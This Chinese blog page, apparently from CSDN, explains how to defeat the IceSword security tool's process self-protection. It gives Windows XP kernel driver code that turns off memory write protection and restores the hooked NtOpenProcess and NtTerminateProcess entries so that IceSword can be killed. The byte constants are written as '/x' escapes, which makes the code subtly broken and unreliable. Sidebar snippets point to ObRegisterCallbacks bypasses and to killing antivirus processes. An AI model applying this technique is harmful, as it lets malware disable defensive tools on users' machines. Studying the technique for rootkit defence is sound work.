突破IceSword自身的进程保护

最新推荐文章于 2025-05-16 10:43:02 发布
最新推荐文章于 2025-05-16 10:43:02 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: windows底层核心編程 文章标签: hook byte struct windows object string

by xyzreg

IceSword的驱动对其自身进程做了保护,使恶意程序终止不了他。IceSword没有用HOOK SSDT的方法,不过也没用什么太BT的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess几个函数,即修改函数前5个字节,jmp到他自定义处理函数例程里。

终止采用这类保护方法的进程,可以使用暴力的PspTerminateProcess方法,PspTerminateProcess函数未导出,需要我们自己穷举特征码搜索来定位,或者硬编码之。当然,我们还可以恢复IceSword的Inline hook,还原被IceSword挂钩过的NtOpenProcess、NtTerminateProcess函数,然后在用户态上使用普通的终止进程的方法就可以终止他了。这里给出了第二中方法的具体代码,不过由于此篇文章出于科普目的,代码就写得马虎点了,仅适用于Windows XP,因为取SSDT对应的函数索引号用的硬编码,说明问题而已。NtTerminateProcess未导出,大家可以自己改成通过读取ntdll.dll动态通用的获得索引号的方法,方法网上有公开,需要的人就自己动点手吧,呵呵~


#include <ntddk.h>

#define DWORD unsigned long

unsigned char OldCode[5]="/x68/xc4/x00/x00/x00";
unsigned char OldCode2[5]="/x8b/xff/x55/x8b/xec";

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
 unsigned int *ServiceTableBase;
 unsigned int *ServiceCounterTableBase;
 unsigned int NumberOfServices;
 unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
 DWORD OpAddr,OpAddr2;

 OpAddr=*(KeServiceDescriptorTable.ServiceTableBase + 0x7A);
 OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase + 0x101);

 _asm
 {
   CLI            
   MOV   eax, CR0    
   AND eax, NOT 10000H
   MOV   CR0, eax

   pushad
   mov edi, OpAddr
   mov eax, dword ptr OldCode[0]
   mov [edi], eax
   mov al, byte ptr OldCode[4]
   mov [edi+4], al
   mov edi, OpAddr2
   mov eax, dword ptr OldCode2[0]
   mov [edi], eax
   mov al, byte ptr OldCode2[4]
   mov [edi+4], al
   popad

   MOV   eax, CR0
   OR   eax, 10000H
   MOV   CR0, eax
   STI
 }
           
 return STATUS_SUCCESS;
}
 
总结一下ObRegisterCallbacks绕过
zhuhuibeishadiao
10-18 5681
1.物理Section Map到用户空间 解析物理地址操作内存 2.修改PsProcessType/PsThreadType下_OBJECT_TYPE_INITIALIZER下RetainAccess为0x1fffff 无视抹权限 原理见ObpPreInterceptHandleCreate ObpPreInterceptHandleCreate(PVOID Object, unsigned _...
冰刃IceSword
08-01
冰刃能够突破这种隐藏,显示出这些隐蔽的进程,使得用户可以清楚地了解到系统中正在运行的所有程序,从而判断是否存在潜在的安全风险。 2. **非法进程检测** 非法进程通常是指那些未经用户许可而擅自运行,甚至...
程序冰刃 网络维护终止守护进程
05-03
冰刃计算机网络维护网络安全终止守护进程,及其木马病毒程序,查看隐藏进程
莫防破解模块2.0,支持全系统隐藏进程保护进程,隐藏模块,支持win7 64位隐藏进程,,支持win8 64位隐藏进程,支持win10 64位隐藏进程
07-07
莫防破解模块2.0,支持全系统隐藏进程保护进程,隐藏模块,支持win7 64位隐藏进程,隐藏模块,支持win8 64位隐藏进程,隐藏模块支持win10 64位隐藏进程,隐藏模块 如发现个别机子隐藏时 蓝屏,请记住 开始蓝屏的时长,可写个循环,例如20分钟蓝屏,便20分钟取消隐藏进程,然后重新加载隐藏进程
易语言 win7 64位隐藏进程模块,保护进程模块
05-26
易语言隐藏进程模块支持WIn7 64位,保护进程 ,防破解,防注入,防Ce,WPE
rootkit学习总结2
bcbobo21cn的专栏
04-13 6451
关于rootkit小资料 一,前言 二,简介 三,rootkit的一些以公开的隐藏技术 四,一些隐藏技术的应对方法 五,about ring0 rootkit 六,rootkit的检测 七,参考资料,推荐 ************************* 一.先说几句与技术无关的话。 ************************* 二.简单的说说rootkit.
Windows任务管理器
weixin_34037173的博客
12-29 482
Windows任务管理器提供了有关计算机性能的信息,并显示了计算机上所运行的程序和进程的详细信息,可以显示最常用的度量进程性能的单位;如果连接到网络,那么还可以查看网络状态并迅速了解网络是如何工作的,今天,我们就来全面了解任务管理器的方方面面。从启动任务管理器开始  1 Ctrl+Alt+Del  最常见的方法启动任务管理器的方法:  在Windows 98或更高版本...
冰刃IceSword中文版: 强大系统查探与后门处理工具
它们能够轻易隐藏自己的进程、端口、注册表项和文件信息,使得传统的安全软件难以发现。为了解决这一问题,IceSword引入了多种新颖的内核级技术,从而突破了这些恶意软件的隐蔽性,增强了其对系统底层威胁的检测和...
掌握系统进程管理:wsyscheck与冰刃process-X工具解析
- 内核级别的进程管理:icesword能够展示系统的底层进程和线程信息,突破常规限制。 - 模块查看与管理:用户可以查看系统加载的驱动和模块,并对其进行管理。 - 文件、注册表查看和编辑:icesword可以直接查看和...
冰刃:揭秘系统隐藏进程与文件的利器
描述中提到“可以查看系统中的所有进程(包括隐藏进程)”,这表明冰刃具有深层次的系统内核级别访问能力,允许用户监视和分析当前操作系统上运行的所有进程,即便是那些试图隐藏自己避免被常规任务管理器发现的进程也...
XueTr进程管理工具:超越冰刃的全面功能体验
综上所述,XueTr是一个集成度高、功能强大的IT安全工具,它在进程管理、注册表管理和文件操作方面都提供了高级功能,尤其在解锁隐藏文件方面有所突破。虽然与冰刃和Unlocker这类工具在某些方面有所重合,但XueTr在...
system权限在dos下k掉各种杀软,无视保护进程
weixin_30480583的博客
07-28 471
通常情况下会使用 takskill /f /pid 进程号 来结束掉某某杀毒,但是会发现杀毒结束不掉,要么就是结束掉了立马又出现了 下面 无视保护进程 ------------------------------------------------------------------------------------------------------------...
进程保护
Henzox的专栏
06-18 8456
看到这个题目,
ObRegisterCallbacks
weixin_30627381的博客
06-25 245
ObRegisterCallbacks 转载于:https://www.cnblogs.com/kb505/p/7077593.html
ssdt_表_遍历
05-12 653
#include"ntddk.h" #pragma pack(1) //写这个内存以一字节对齐 如果不写是以4字节的对齐的 typedef struct ServiceDescriptorEntry {//这个结构就是为了管理这个数组而来的 内核api所在的数组 才有这个结构的 这个是ssdt unsigned int *ServiceTableBase;//就是ServiceTa...
SSDT-hook,IDT-hook原理
fun0526的专栏
08-04 2582
<br /><br />【详细过程】<br />这次主要说说核心层的hook。包括SSDT-hook,IDT-hook,sysenter-hook。欢迎讨论,指正!内核层需要驱动,有这方面的基础最好,如果不会,了解下其中的思路也可以的。<br /><br />II. SSDT-hook,IDT-hook,sysenter-hook<br />一.SSDT-hook<br />(一)一般思路:<br />1.先来了解一下,什么是SSDT<br />SSDT既System Service Dispath Tab
来一个复古的技术FTP
最新发布
窦再兴的博客
05-16 864
在升级Spring Boot框架的过程中,测试FTP下载业务时遇到问题,最终通过搭建本地FTP服务器解决。本文详细记录了在CentOS 7上安装和配置vsftpd的步骤,包括安装、启动服务、配置防火墙、修改vsftpd配置文件、创建FTP用户等。此外,还提供了Spring Boot 3的FTP-Demo代码,展示了如何通过Java代码实现FTP文件下载功能。文章最后提到,可以根据FtpUtil扩展SftpUtil的代码,以支持Sftp模式。整个过程旨在为类似需求提供参考,避免重复劳动。
Java零基础学习Day12——集合ArrayList
m0_68932052的博客
05-13 543
集合只存引用数据类型;长度可变数组可存基本数据类型、引用数据类型;长度固定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值